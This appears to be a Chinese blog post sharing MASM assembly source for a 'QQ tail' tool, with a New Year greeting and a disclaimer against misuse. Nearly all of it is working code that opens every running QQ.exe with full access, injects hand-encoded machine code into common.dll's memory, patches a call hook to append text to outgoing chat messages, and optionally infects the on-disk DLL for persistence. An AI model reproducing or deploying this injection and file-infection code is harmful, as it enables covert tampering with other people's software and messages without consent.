QQ尾巴源码[2009版以上通杀],别拿去做坏事[ASM版]

 
我衷心的祝福大家在新的一年里工作顺利;心想事成;万事如意!
2010年新年快乐~\(�R��Q)/~
BY: Dream Flyer

 
 

.386
.model flat, stdcall
option casemap :none

include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc
include gdi32.inc
include shlwapi.inc

includelib gdi32.lib
includelib shlwapi
includelib user32.lib
includelib kernel32.lib
includelib masm32.lib
include macro.asm
    MemSearch PROTO : DWORD,:DWORD,:DWORD,:DWORD
    ZjSearch    PROTO : DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    GetModuleAddr Proto:DWORD,:DWORD
    HookQQChat Proto:DWORD,:DWORD
    AnsiToUnicode proto:DWORD
    UnicodeToUtf8 proto:DWORD
    AnsiToUtf8 proto:DWORD
    UniCodeLen proto:DWORD
    StartProc proto
.data
         Zl db 255, 210, 137, 93, 16, 139, 78, 76, 141, 69, 16, 80    
         Code db 131, 248, 1, 15, 133, 210, 0, 0, 0, 96
                _     db 139, 69, 236, 139, 64, 12, 139, 72, 4    
                __     db 129, 249, 1, 77, 83, 71, 116, 18, 139, 72, 16, 129, 249
                ___     db 0, 77, 83, 71, 15, 133, 176, 0, 0, 0, 131, 192, 12, 129, 120, 41    
                ____     db 9, 1, 0, 1, 15, 132, 160, 0, 0, 0, 128, 120, 252, 2, 15, 132, 150, 0, 0, 0    
                _____    db 128, 120, 42, 2, 15, 132, 140, 0, 0, 0, 51, 201, 249, 114, 4, 102, 135, 88, 43    
                ______    db 102, 139, 80, 43, 134, 242, 102, 185, 101, 0, 102, 3, 209, 134, 242, 102, 137, 80
                _______ db 43, 131, 251, 0, 139, 209, 81, 139, 72, 40, 116, 13, 134, 214, 102, 137, 80, 43, 134
                ________    db 214, 131, 194, 3, 51, 201, 134, 205, 102, 3, 209, 134, 214, 102, 137, 80, 40, 131, 233, 3
                _________    db 119, 2, 51, 201, 129, 225, 255, 255, 0, 0, 141, 124, 8, 45, 89, 232, 0, 0, 0, 0, 88, 131, 192, 63
                __________    db 139, 240, 81, 243, 164, 89, 139, 69, 236, 131, 251, 0, 116, 5, 134, 251, 102, 43, 203, 102, 1, 72, 4
                ___________    db 139, 64, 12, 139, 80, 4, 129, 250, 1, 77, 83, 71, 116, 13, 139, 80, 5, 134, 242, 102, 3, 209, 134, 242
                ____________    db 137, 80, 5, 97, 137, 93, 16, 139, 78, 76, 195, 144
         Codelen dd 227 ;也可以用 Codelen-Code 得出
     posBuffer db 10 dup (0)
     ModAddr dd ?
     ModName db "common.dll",0
     QQ            db "QQ.exe",0
     Call_     db    232
     ADDR_     dd ?
     NOP_        db 144
     STR_        db    13,10,"我衷心的祝福大家在新的一年里工作顺利;心想事成;万事如意!",13,10
     STR__     db        "2010年新年快乐~\(�R��Q)/~",13,10
     STR___    db                "            BY: Dream Flyer",0
     Wjgr        db 0                ;如果为1 表示感染QQ文件,下次运行自己发作
     szModulePath db 256 dup(?)
         ModulePath db 256 dup(?)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>已经解除硬编码
                ;BY: Dream Flyer
                ;EMail:[email protected]
.data?

    
.CODE
START:        
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<
invoke StartProc        ;||
invoke ExitProcess,0     ;||
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<
StartProc proc    
        LOCAL    info:PROCESSENTRY32
            LOCAL    handle:HANDLE
            invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;进程快照
            mov        handle,eax
            mov        info.dwSize,sizeof PROCESSENTRY32
            invoke Process32First,handle,addr info
        .repeat
                invoke lstrcmpi,addr info.szExeFile,addr QQ ;比较是否为我们要找的进程名,不区分大小写
                .if !eax
                invoke HookQQChat, info.th32ProcessID,addr STR_;挂钩每个QQ程序
;             invoke wsprintf, addr posBuffer,CTXT("%d"),info.th32ProcessID ;转化成文本
;            invoke MessageBoxA,0,addr posBuffer,CTXT("地址:"),MB_OK
                .endif
                invoke Process32Next,handle,addr info
            .until !eax
            invoke CloseHandle,handle
            ret
StartProc endp

HookQQChat proc PID,ChatText
local Rpid,HookAddr,Utf8,Utf8Len,CodeAddr,NullData,AllLen,Bh_,Openf:OFSTRUCT,Hfile
invoke OpenProcess, 2035711, 0, PID    ;PROCESS_ALL_ACCESS 全部权限
.if eax == 0 ;打开进程失败
     jmp exit_
.endif
    mov Rpid,eax;保存句柄
     invoke GetModuleAddr,PID,addr ModName
add eax,1000H
mov ModAddr,eax
invoke MemSearch,PID,addr Zl, ModAddr,12 ;:<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<12是ZL长度
         ; invoke wsprintf, addr posBuffer,CTXT("%lX"),eax ;转化成文本
         ; invoke MessageBoxA,0,addr posBuffer,CTXT("地址:"),MB_OK
mov HookAddr,eax
            xor ax,ax
            cmp eax,0
            mov eax,2    ;返回值
            je exit_ ; 地址太小,说明没成功
add HookAddr,2    ;地址加2
invoke GlobalAlloc,GMEM_FIXED,Codelen
.if eax!=0
     mov CodeAddr,eax
     invoke RtlMoveMemory,CodeAddr,addr Code,Codelen
     invoke AnsiToUtf8,ChatText
     mov Utf8,eax
     invoke lstrlen,eax;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<硬编码后,删除些代码
     mov Utf8Len,eax;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<此处硬编码,可以防止别人修改AX的值为内容长度
     mov ecx,CodeAddr
     push ecx
     add ecx,95
     mov WORD ptr [ecx],ax;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<硬编码后,删除些代码
     pop ecx
     add ecx,Codelen
     invoke RtlMoveMemory,ecx,Utf8,Utf8Len
     mov eax,Codelen
     add eax,Utf8Len
     mov AllLen,eax
     push eax
     invoke GlobalAlloc,GMEM_FIXED,eax
     pop ecx
     push eax
     invoke RtlZeroMemory,eax,ecx
     pop eax
     invoke MemSearch,PID,eax, ModAddr,AllLen
     mov NullData,eax
            xor ax,ax
            cmp eax,0
            mov eax,3 ;返回值
            je exit_ ; 地址太小,说明没成功
     add NullData,2 ;地址加2
     invoke VirtualProtectEx,Rpid,NullData,AllLen,4,addr Bh_    
     cmp eax,0
     mov eax,5;返回值
     je exit_
     invoke WriteProcessMemory,Rpid,NullData,CodeAddr,AllLen,addr Bh_
     xor eax,eax
     mov eax,4 ;返回值
     sub Bh_,2
     jb end__ ;没有写入成功
     invoke VirtualProtectEx,Rpid, HookAddr, 6, 4, addr Bh_
     mov eax,NullData
     sub eax,HookAddr
     sub eax,5             ;计算相对地址
     mov ADDR_,eax
     invoke WriteProcessMemory,Rpid,HookAddr,addr Call_, 6, addr Bh_
     xor eax,eax
     inc eax ;返回值
     sub Bh_,2
     jb end__ ;没有写入成功
     .if Wjgr==1 ;QQ文件感染代码
        invoke PathFileExists,addr szModulePath;文件存在,说明感染过了
        .if eax
                invoke MoveFile,addr ModulePath,addr szModulePath
            invoke CopyFile,addr szModulePath,addr ModulePath,0
            invoke OpenFile,addr ModulePath,addr Openf,OF_READWRITE
            mov Hfile,eax
            mov eax,NullData
            and eax,0ffffffH ;
            invoke SetFilePointer ,Hfile,eax,NULL,FILE_BEGIN
            invoke WriteFile,Hfile,CodeAddr,AllLen,addr Bh_,NULL
            mov eax,HookAddr
            and eax,0ffffffH
            invoke SetFilePointer ,Hfile,eax,NULL,FILE_BEGIN
            invoke WriteFile,Hfile,addr Call_ ,6,addr Bh_,NULL
            invoke CloseHandle,Hfile
            
        .endif
        
     .endif
.endif    
end__:
push eax
invoke CloseHandle,Rpid
     pop eax
    exit_:ret
HookQQChat endp

AnsiToUnicode proc Ansi
local len,UnicodeAddr
invoke MultiByteToWideChar,936,0,Ansi,-1,0,0
shl eax,1 ;相当于乘2
mov len,eax
invoke GlobalAlloc,GMEM_FIXED,len
.if eax!=0
    mov UnicodeAddr,eax
    invoke MultiByteToWideChar ,936, 0, Ansi, -1, eax, len
    mov eax,UnicodeAddr
.endif
ret
AnsiToUnicode endp
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<UnicodeToUtf8
UnicodeToUtf8 proc Unicode
local utf8_len
invoke UniCodeLen,Unicode
invoke WideCharToMultiByte,65001, 0, Unicode, eax, 0, 0, 0, 0
mov utf8_len,eax
invoke GlobalAlloc,GMEM_FIXED,eax
push eax
invoke WideCharToMultiByte,65001, 0, Unicode, -1, eax, utf8_len, 0, 0
pop eax
ret
UnicodeToUtf8 endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
AnsiToUtf8 Proc Ansi
     invoke AnsiToUnicode,Ansi
     invoke UnicodeToUtf8,eax
ret
AnsiToUtf8 endp

UniCodeLen proc uses ebx Unicode
    xor         eax, eax
    mov ecx,[ebp+8H]
L001:
    cmp         WORD ptr [ecx], 0
    je L011
    inc         eax
    xor         ebx, ebx
    mov         bx, WORD ptr [ecx]
    cmp         bh, 0
    je L009
    inc         eax
L009:
    add         ecx, 2
    jmp L001
L011:
ret
UniCodeLen endp
;===================================================================================搜索进程内存
MemSearch proc PID,TXT,Start,TXTlen
local Rpid,DataBuff,Wz
local Men:MEMORY_BASIC_INFORMATION
invoke OpenProcess, 2035711,0, PID    ;取得操作句柄
.if eax != 0
     mov Rpid,eax;保存句柄
     @1:
     invoke VirtualQueryEx, Rpid,Start,addr Men,28 ;取得内存块信息
         .if eax != 0
                invoke GlobalAlloc,GMEM_FIXED,Men.RegionSize
                 .if eax != 0 ;申请成功
                     mov DataBuff,eax ;申请内存地址
                         invoke ReadProcessMemory ,Rpid,Start,eax,Men.RegionSize ,0 ;读取内存
                                 .if eax!=0 ;有数据
                                    invoke ZjSearch, DataBuff,TXT,1,Men.RegionSize, TXTlen;寻找字符串
                                         .if eax!=-1 ;找到了
                                            mov Wz,eax ;找到位置
                                            invoke CloseHandle, Rpid ;关闭句柄
                                            mov eax,Wz
                                            add eax,Start
                                            dec eax    ;找到位置减1
                                            jmp END_ ;找到后就返回
                                         .endif
                             .else
                            add ax,3 ;EAX=3 错误代码
                                 .endif
                                    
                         .else
                        ;申请内存失败
                        add ax,2 ;EAX=2 错误代码
                        .endif
             mov eax,Men.RegionSize
                 add Start,eax ;起始地址 = 起始地址 + 内存块信息.大小
                 jmp @1 ;循环搜索
         .else
            add ax,4;EAX=4 错误代码
             .endif    
                
    .else
        inc eax    ;EAX=1 错误代码
.endif
push eax
invoke CloseHandle, Rpid ;关闭句柄
pop eax
END_:ret
MemSearch endp
;==============================================================================================
    ZjSearch proc uses edi esi edx ebx Zj1,Zj2,Start,leng1,leng2; 搜索字节集
        mov         edi,    [ebp+8H]
        test        edi, edi
        je L059
        mov         ebx,    [ebp+14H]
        cmp         ebx, 0
        jle L059
        mov         edx,    edi
        mov         esi,    [ebp+0CH]
        test        esi, esi
        je L059
        mov         ecx,    [ebp+18H]
        cmp         ecx, 0
        jle L059
        mov         eax, esi
        mov         [ebp-0CH], eax
        mov         eax,    [ebp+10H]
        dec         eax
        cmp         eax, 0
        jge L022
        xor         eax, eax
    L022:
        mov         [ebp+10H], eax
        sub         ebx, eax
        cmp         ecx, ebx
        jg L059
        dec         ecx
        mov            [ebp-8], ecx
        sub         ebx, ecx
        mov            [ebp-4], ebx
        add         edx, eax
    L031:
        mov         esi, [ebp-0CH]
        mov         edi, edx
        mov         ecx, ebx
        mov         ah, [esi]
        inc         esi
    L036:
        jecxz L059
        mov         al,    [edi]
        inc         edi
        dec         ecx
        xor         al, ah
        jnz L036
        mov         edx, edi
        mov         ebx, ecx
        mov         ecx,    [ebp-8H]
        jecxz L055
L046:     mov         ah,    [esi]
        mov         al,    [edi]
        inc         esi
        inc         edi
        xor         al, ah
        jnz L031
        dec         ecx
        jecxz L055
        jmp L046
L055:     mov         eax,    [ebp+10H]
        add         eax,    [ebp-4H]
        sub         eax, ebx
        jmp         end_
L059:     or            eax, 0FFFFFFFFH
     end_:ret
    ZjSearch endp
;==============================================================================搜索字节集结束
     GetModuleAddr proc PID,ModNameAddr ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<取进程内模块地址
     local Snapshot:HANDLE,Module:MODULEENTRY32
     invoke CreateToolhelp32Snapshot,8,PID
        .if eax == 0
         jmp End_
        .endif
        mov Module.dwSize,sizeof MODULEENTRY32
        mov Snapshot,eax ;保存快照句柄
        invoke Module32First,Snapshot,addr Module
        @3:cmp eax,0
        je    @2
         invoke lstrcmpi,ModNameAddr,addr Module.szModule
         .if!eax
            invoke lstrlen, addr Module.szModule
            push eax
            invoke lstrlen, addr Module.szExePath
            pop ecx
            sub eax,ecx ;目录长度
            push eax
            invoke RtlZeroMemory,addr szModulePath,200H;清空内容先
            mov eax,[esp]
            invoke RtlMoveMemory,addr szModulePath,addr Module.szExePath,eax
            invoke lstrlen, addr Module.szExePath
            invoke RtlMoveMemory,addr ModulePath,addr Module.szExePath,eax
            pop ecx
            mov eax,offset szModulePath
            add eax,ecx
            invoke RtlMoveMemory,eax,CTXT("Dream Flyer.dll"),15
;            invoke MessageBox,NULL,addr szModulePath,CTXT("123"),MB_OK
;            invoke MessageBox,NULL,addr     ModulePath,CTXT("123"),MB_OK
                mov eax,Module.hModule ;模块地址
            jmp End_
         .endif
         invoke Module32Next,Snapshot,addr Module
         jmp @3
     @2:invoke CloseHandle,Snapshot
     End_:ret
     GetModuleAddr endp
;===================================================================取模块地址结束
end START

你可能感兴趣的:(职场,休闲)